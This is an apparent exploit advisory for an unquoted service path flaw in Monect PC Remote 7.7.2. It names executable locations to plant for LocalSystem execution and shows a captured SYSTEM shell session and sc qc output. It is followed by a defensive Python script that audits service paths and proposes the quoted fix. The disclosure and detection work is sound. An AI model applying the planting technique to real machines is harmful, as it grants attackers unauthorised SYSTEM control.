# Exploit Title: Monect PC Remote 7.7.2 - Unquoted path service
# Date: 25/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.monect.com/
# Software Link: https://github.com/monect/pcremote-release/releases/download/v7.7.2/PCRemoteReceiverSetup_7_7_2.exe
# Version: 7.7.2
# Tested on: Windows 10

'''
Monect PC Remote 7.7.2 has an unquoted service path vulnerability in
MonectServerService. This allows local attackers with write access to
execute code as LocalSystem by placing a malicious executable in the
service path and restarting the service.

Example file names and locations:

PC.exe in C:\
PC.exe in C:\Program Files\
PC Remote.exe in C:\Program Files\

Connection received on 192.168.8.105 49671
Microsoft Windows [Version 10.0.19045.5011]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
'''

sc qc MonectServerService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MonectServerService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\PC Remote Receiver\MonectServerService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MonectServerService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
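
A defender-side check for the condition visible in the sc qc output above, as an added example that is not part of the original advisory: it parses sc qc output, flags an unquoted BINARY_PATH_NAME containing spaces, and returns the directories whose write permissions need auditing together with the quoted form of the path. The function names are hypothetical, the sample input is re-typed from this page, and the service image is assumed to end in .exe.

```python
import ntpath
import re

# Constructed input: sc qc fields shown on this page, re-typed one per line.
SC_QC_OUTPUT = r"""
SERVICE_NAME: MonectServerService
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\PC Remote Receiver\MonectServerService.exe
        SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(text):
    """Parse 'KEY : value' lines of `sc qc` output into a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s?(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def audit_image_path(image_path):
    """Flag an unquoted image path with spaces; return dirs to ACL-check and the fix."""
    path = image_path.strip()
    if path.startswith('"'):
        return {"unquoted_with_spaces": False, "audit_dirs": [], "quoted": path}
    # Separate the executable from trailing arguments (assumes a .exe image).
    m = re.match(r"(.+?\.exe)(\s.*)?$", path, re.IGNORECASE)
    exe, args = (m.group(1), m.group(2) or "") if m else (path, "")
    # Every space in the executable path is a point where Windows may stop
    # parsing; the directory holding that prefix must not be user-writable.
    dirs = [ntpath.dirname(exe[:i]) for i, ch in enumerate(exe) if ch == " "]
    return {
        "unquoted_with_spaces": bool(dirs),
        "audit_dirs": list(dict.fromkeys(dirs)),  # de-duplicate, keep order
        "quoted": f'"{exe}"{args}',
    }

def audit_service(sc_qc_text):
    """Combine the path check with the account the service runs as."""
    fields = parse_sc_qc(sc_qc_text)
    finding = audit_image_path(fields.get("BINARY_PATH_NAME", ""))
    finding["service"] = fields.get("SERVICE_NAME")
    finding["runs_as"] = fields.get("SERVICE_START_NAME")
    return finding

if __name__ == "__main__":
    for key, value in audit_service(SC_QC_OUTPUT).items():
        print(f"{key}: {value}")
```

The "quoted" value is the form the service's image path should take once remediated; a finding with runs_as set to LocalSystem is the highest-priority case.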